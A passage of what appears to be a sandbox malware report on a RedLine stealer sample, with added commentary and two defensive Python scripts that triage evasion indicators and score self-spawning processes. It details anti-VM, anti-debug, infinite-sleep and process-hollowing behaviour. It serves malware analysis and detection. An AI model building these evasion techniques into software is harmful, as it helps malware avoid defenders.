Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D4A0 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 0_2_000000014004D4A0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D4BE SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 0_2_000000014004D4BE
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D4DF SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 0_2_000000014004D4DF
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D500 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 0_2_000000014004D500
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D792 FindFirstFileW,GetLastError, 0_2_000000014004D792
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D7E0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime, 0_2_000000014004D7E0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D990 SystemTimeToFileTime,LocalFileTimeToFileTime,GetLastError,GetSystemTimeAsFileTime,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,CreateFileW,GetLastError,SetFileTime,GetLastError,CloseHandle,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 0_2_000000014004D990
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140061A30 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,CopyFileW,GetLastError,FindNextFileW,FindClose, 0_2_0000000140061A30
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004CAE0 SetLastError,DeleteFileW,GetLastError,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,DeleteFileW,GetLastError,FindNextFileW,FindClose, 0_2_000000014004CAE0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140032DC0 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose, 0_2_0000000140032DC0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004DFA0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose, 0_2_000000014004DFA0
Source: C:\Users\user\AppData\Roaming\325.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: vmware
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: kS2dqbsDwD.exe Binary or memory string: Hyper-V RAW
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: 325.exe, 0000000E.00000002.362868644.0000000000EAF000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Roaming\325.exe Process information queried: ProcessInformation Jump to behavior
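The findings in this section reduce to a few evasion families: WMI hardware fingerprinting (Win32_DiskDrive, Win32_VideoController, Win32_Processor), sandbox and hypervisor artifact strings (SBIEDLL.DLL, WINE_GET_UNIX_FILE_NAME, VMware Tools paths and registry keys), effectively infinite sleeps, and language checks. Two values deserve decoding. The delay 922337203685477 is INT64_MAX in 100-nanosecond units expressed in milliseconds (9223372036854775807 * 100 ns = 922337203685477.58 ms), the largest relative interval NtDelayExecution accepts, so those threads are parked for the life of the process rather than sleeping for a measurable time; 5534023222112862 is exactly six such intervals. The immediates in the GetKeyboardLayout compares (0ah, 19h) are the primary language IDs LANG_SPANISH and LANG_RUSSIAN, which is how the sandbox derives its country labels. Note, though, that kS2dqbsDwD.exe is a compiled AutoHotkey binary (see the AutoHotkey runtime strings under the HIPS section, and the Signatures list), whose hotkey and Send engine calls GetKeyboardLayout and GetLocalTime itself, so the process-0 code-function hits are heuristic matches on the interpreter and not by themselves proof of geofencing; the WMI and artifact-string checks in 325.exe (the RedLine process, where the AntiVM3 Yara rule also matched) are the substantive evasion. The script below is an added example, not part of the report or of Joe Sandbox: it parses lines in the format used above (copied here as constructed sample input), keeps the evasion indicators, groups them by ATT&CK technique and counts parked threads. Its regexes, indicator lists and technique mapping are its own assumptions.

```python
"""Evasion-signature triage over report lines in the format used above.

Added example, not part of the report or of Joe Sandbox. The regexes, the
indicator lists and the technique mapping are this example's own assumptions.
"""
import re

# INT64_MAX in 100-ns units, in milliseconds: 9223372036854775807 * 100 ns =
# 922337203685477.58 ms, the "delay time" printed in the report above.
INT64_MAX_100NS_AS_MS = ((2 ** 63 - 1) * 100) // 1_000_000

# WMI classes routinely queried to fingerprint a hypervisor (assumed list).
VM_WMI_CLASSES = {"win32_diskdrive", "win32_videocontroller", "win32_processor",
                  "win32_computersystem", "win32_bios", "win32_baseboard"}
# Substrings naming a sandbox, emulator or hypervisor (assumed list). "hyper-v" also
# matches the legitimate Winsock provider "Hyper-V RAW" in mswsock.dll: evidence, not proof.
SANDBOX_MARKERS = ("sbiedll", "wine_get_unix_file_name", "vmware", "vbox",
                   "virtualbox", "qemu", "hyper-v", "xen")
# Primary language IDs (LANG_* in winnt.h). LOWORD(HKL) is a LANGID and
# PRIMARYLANGID(langid) == langid & 0x3FF, so an immediate compared against it is a country.
LANGID_NAMES = {0x07: "German", 0x09: "English", 0x0A: "Spanish", 0x0C: "French",
                0x19: "Russian", 0x22: "Ukrainian", 0x23: "Belarusian", 0x3F: "Kazakh"}

TECHNIQUE = {
    "wmi": "T1497.001 System Checks (WMI, T1047)",
    "marker": "T1497.001 System Checks (artifact strings)",
    "delay": "T1497.003 Time Based Evasion",
    "langid": "T1614.001 System Language Discovery",
}

WMI_RE = re.compile(r"WMI Queries: .*?\bFROM\s+(\w+)", re.I)
STRING_RE = re.compile(r"Binary or memory string:\s*(.+?)\s*$")
DELAY_RE = re.compile(r"Thread delayed: delay time:\s*(\d+)")
SLEEP_RE = re.compile(r"Thread sleep time:\s*-?(\d+)s")
KBD_RE = re.compile(r"GetKeyboardLayout followed by cmp: cmp (.+?) and CTI")
IMM_RE = re.compile(r",\s*([0-9A-Fa-f]+)h$")


def parse_line(line):
    """Classify one report line as (kind, detail); None if it is not an evasion indicator."""
    if m := WMI_RE.search(line):
        cls = m.group(1)
        return ("wmi", cls) if cls.lower() in VM_WMI_CLASSES else None
    if m := STRING_RE.search(line):
        text = m.group(1).lower()
        hit = next((k for k in SANDBOX_MARKERS if k in text), None)
        return ("marker", hit) if hit else None
    if m := DELAY_RE.search(line) or SLEEP_RE.search(line):
        # Both forms print the raw interval; the "s" suffix is the sandbox's label,
        # so the value is kept as printed rather than converted.
        return ("delay", int(m.group(1)))
    if m := KBD_RE.search(line):
        imm = IMM_RE.search(m.group(1))  # "dl, 00000019h" -> 0x19; memory operand -> None
        return ("langid", int(imm.group(1), 16) if imm else None)
    return None


def is_effectively_infinite(interval):
    """True for the INT64_MAX relative delay (or a per-thread multiple of it)."""
    return interval >= INT64_MAX_100NS_AS_MS


def describe(kind, detail):
    """Evidence label for one parsed indicator."""
    if kind == "delay":
        if is_effectively_infinite(detail):
            return "NtDelayExecution(INT64_MAX): thread parked indefinitely"
        return f"sleep interval {detail} (as printed)"
    if kind == "langid":
        if detail is None:
            return "HKL compare without immediate"
        return "LANGID 0x%02X (%s)" % (detail, LANGID_NAMES.get(detail, "unknown"))
    return detail


def triage(report_text):
    """Return ({technique: sorted unique evidence}, count of threads parked indefinitely)."""
    evidence, parked = {}, 0
    for line in report_text.splitlines():
        if (parsed := parse_line(line)) is None:
            continue
        kind, detail = parsed
        if kind == "delay" and is_effectively_infinite(detail):
            parked += 1
        evidence.setdefault(TECHNIQUE[kind], set()).add(describe(kind, detail))
    return {k: sorted(v) for k, v in evidence.items()}, parked


# Constructed sample input: lines copied from the evasion section of this report.
SAMPLE_LINES = r"""
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: 325.exe, 0000000E.00000002.362868644.0000000000EAF000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Roaming\325.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe TID: 5044 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe TID: 5644 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140013FF0 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jl 0000000140014030h country: Spanish (es) 0_2_0000000140013FF0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140014380 GetKeyboardLayout followed by cmp: cmp dl, 00000019h and CTI: ja 00000001400144F3h country: Russian (ru) 0_2_0000000140014380
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014000DAA0 GetKeyboardLayout followed by cmp: cmp word ptr [r14+02h], bp and CTI: jne 000000014000DBAAh 0_2_000000014000DAA0
"""

if __name__ == "__main__":
    summary, parked = triage(SAMPLE_LINES)
    for technique, items in summary.items():
        print(technique, items)
    print("threads parked indefinitely:", parked)
```

On the sample lines, the WMI classes and artifact strings land under T1497.001, the two INT64_MAX intervals are counted as parked threads under T1497.003, and the two immediates decode to Spanish and Russian under T1614.001, while the memory-operand compare is kept but marked as carrying no language at all.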

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400B12B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00000001400B12B0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140060290 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetOpenUrlW,FreeLibrary,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,FreeLibrary,DeleteFileW,FreeLibrary, 0_2_0000000140060290
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400C2648 GetStringTypeW,GetProcessHeap,IsValidCodePage, 0_2_00000001400C2648
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\325.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400BC054 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00000001400BC054
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400B12B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00000001400B12B0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400C24B8 SetUnhandledExceptionFilter, 0_2_00000001400C24B8
Source: C:\Users\user\AppData\Roaming\325.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to launch a program with higher privileges
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140036D50 CreateProcessW,CloseHandle,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW, 0_2_0000000140036D50
Contains functionality to simulate keystroke presses
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140010F60 GetCurrentThreadId,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetAsyncKeyState,keybd_event,GetAsyncKeyState,keybd_event,GetAsyncKeyState, 0_2_0000000140010F60
Contains functionality to simulate mouse events
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140062600 mouse_event, 0_2_0000000140062600
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Roaming\325.exe Process created: C:\Users\user\AppData\Roaming\325.exe {path} Jump to behavior
Source: kS2dqbsDwD.exe Binary or memory string: Program Manager
Source: kS2dqbsDwD.exe Binary or memory string: Shell_TrayWnd
Source: kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Binary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowahk_idpidgroupclass%s%uProgram ManagerError text not found (please report)Q\E{0,DEFINEUTF16)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 8 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory"
Source: kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Binary or memory string: regk-hookm-hook2-hooksjoypollPART%i-%i(no)%s%s%s%s%s%s{Raw}%s%cHotstring max abbreviation length is 40.LEFTLRIGHTRMIDDLEMX1X2WUWDWLWRSendInputuser32{Blind}{ClickLl{}^+!#{}RawTempSsASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUPRtlGetVersionntdll.dll%u.%u.%u...%s[%Iu of %Iu]: %-1.60s%s\:\:HKLMHKEY_LOCAL_MACHINEHKCRHKEY_CLASSES_ROOTHKCCHKEY_CURRENT_CONFIGHKCUHKEY_CURRENT_USERHKUHKEY_USERSREG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYDefault3264LineRegExFASTSLOWAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDestroyNamePriorityInterruptNoTimersTypeONLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINTimeoutMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPClipboardAllComSpecFalseProgramFilesTrueAhkPathAhkVersionAppDataAppDataCommonBatchLinesCaretXCaretYComputerNameControlDelayCoordModeCaretCoordModeMenuCoordModeMouseCoordModePixelCoordModeToolTipCursorDDDDDDDDDDefaultGuiDefaultListViewDefaultMouseSpeedDefaultTreeViewDesktopDesktopCommonEndCharEventInfoExitReasonFormatFloatFormatIntegerGuiControlEventGuiEventGuiHeightGuiWidthGuiXGuiYHourIconFileIconHiddenIconNumberIconTipIndexIPAddress1IPAddress2IPAddress3IPAddress4Is64bitOSIsAdminIsCompiledIsCriticalIsPausedIsSuspendedIsUnicodeKeyDelayKeyDelayPlayKeyDurationKeyDurationPlayLanguageLastErrorLineFileLineNumberLoopFieldLoopFileAttribLoopFileDirLoopFileExtLoopFileFullPathLoopFileLongPathLoopFileNameLoopFileShortNameLoopFileShortPathLoopFileSizeLoopFileSizeKBLoopFileSizeMBLoopFileTimeAccessedLoopFileTimeCreatedLoopFileTimeModifiedLoopReadLineLoopRegKeyLoopRegNameLoopRegSubKeyLoopRegTimeModifiedLoopRegTypeMDayMinMMMMMMMMMMonMouseDelayMouseDelayPlayMSecMyDocumentsNowNowUTCNumBatchLinesOSTypeOSVersionPriorHotkeyPriorKeyProgramsProgramsCommonPtrSizeRegViewScreenDPIScreenHeightScreenWidthScriptDirScriptFullPathScriptHwndScriptNameSecStartMenuStartMenuCommonStartupStartupCommonStoreCapslockModeThisFuncThisHotkeyThisLabelThisMenuThisMenuItemThisMenuItemPosTickCountTimeIdleTimeIdlePhysicalTimeSincePriorHotkeyTimeSinceThisHotkeyTitleMatchModeTitleMatchModeSpeedUserNameWDayWinDelayWinDirWorkingDirYDayYearYWeekYYYYRemoveClipboardFormatListenerAddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMe%s\%sRegClassAutoHotkey2Shell_TrayWndCreateWindoweditLucida ConsoleConsolasCritical Error: %s
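The most consequential line in this section is 325.exe starting a second copy of itself in suspended mode: the pattern of a loader that creates a fresh instance of its own image, overwrites it with the decoded payload and resumes it (T1055.012, process hollowing), which fits the earlier unpacking and memory-only Yara matches for this .NET RedLine stage. Suspended creation itself is invisible in ordinary process-creation telemetry, but its surroundings are not: a parent launching its own image, from a user-writable directory, with no arguments. The report's "{path}" is read here as "the command line was just the image path". The script below is an added example, not the sandbox's or the sample's code: it scores constructed Sysmon-style process-creation records on those three signals and includes a benign browser self-spawn to show why the combination, rather than any single signal, is what should alert. The field names follow Sysmon Event ID 1; the directory list, the third record's parent/child relationship and the threshold are assumptions.

```python
"""Self-spawn scoring over process-creation records.

Added example, not code from the report or the sample. Records use the Sysmon
Event ID 1 field names Image, ParentImage and CommandLine and are constructed.
The directory list and the alert threshold are assumptions.
"""
import ntpath
import re

# Directories a dropper can write to without elevation (assumed list).
USER_WRITABLE = re.compile(r"\\(AppData\\(Roaming|Local)|Temp|Downloads|Public)\\", re.I)


def _same_path(a, b):
    """Case-insensitive path equality with Windows semantics, usable on any host."""
    return ntpath.normcase(a) == ntpath.normcase(b)


def arguments_of(command_line, image):
    """Return the command line with the leading image path removed (quoted or bare)."""
    cl = command_line.strip()
    if cl.startswith('"'):
        end = cl.find('"', 1)
        head, rest = (cl[1:], "") if end == -1 else (cl[1:end], cl[end + 1:])
    else:
        head, _, rest = cl.partition(" ")
    return rest.strip() if _same_path(head, image) else cl


def score_event(ev):
    """Return (score, reasons) for one record; each satisfied signal adds one point."""
    reasons = []
    if _same_path(ev["Image"], ev["ParentImage"]):
        reasons.append("parent and child run the same image")
    if USER_WRITABLE.search(ev["Image"]):
        reasons.append("image is in a user-writable directory")
    if arguments_of(ev["CommandLine"], ev["Image"]) == "":
        reasons.append("started with no arguments")
    return len(reasons), reasons


def self_injection_candidates(events, threshold=3):
    """Records whose score reaches the threshold, highest score first."""
    scored = sorted(((score_event(ev)[0], ev) for ev in events), key=lambda t: -t[0])
    return [ev for s, ev in scored if s >= threshold]


# Constructed records. The first mirrors the report's own event; the third is a
# hypothetical dropper launch of a different binary, not taken from the report.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\user\AppData\Roaming\325.exe",
     "ParentImage": r"C:\Users\user\AppData\Roaming\325.exe",
     "CommandLine": r'"C:\Users\user\AppData\Roaming\325.exe"'},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",  # benign self-spawn
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US'},
    {"Image": r"C:\Users\user\AppData\Roaming\325.exe",  # hypothetical: a different parent
     "ParentImage": r"C:\Users\user\Desktop\kS2dqbsDwD.exe",
     "CommandLine": r'"C:\Users\user\AppData\Roaming\325.exe"'},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(score_event(ev), ev["Image"])
    print("candidates:", [ev["Image"] for ev in self_injection_candidates(SAMPLE_EVENTS)])
```

Only the first record reaches the threshold: the browser scores one point (same image, but from Program Files with a long helper command line), and the hypothetical dropper launch scores two (user-writable directory and no arguments, but a different parent). The no-arguments signal is weak on its own; it is the same-image plus user-writable combination that makes it worth paging on.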

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Users\user\AppData\Roaming\325.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
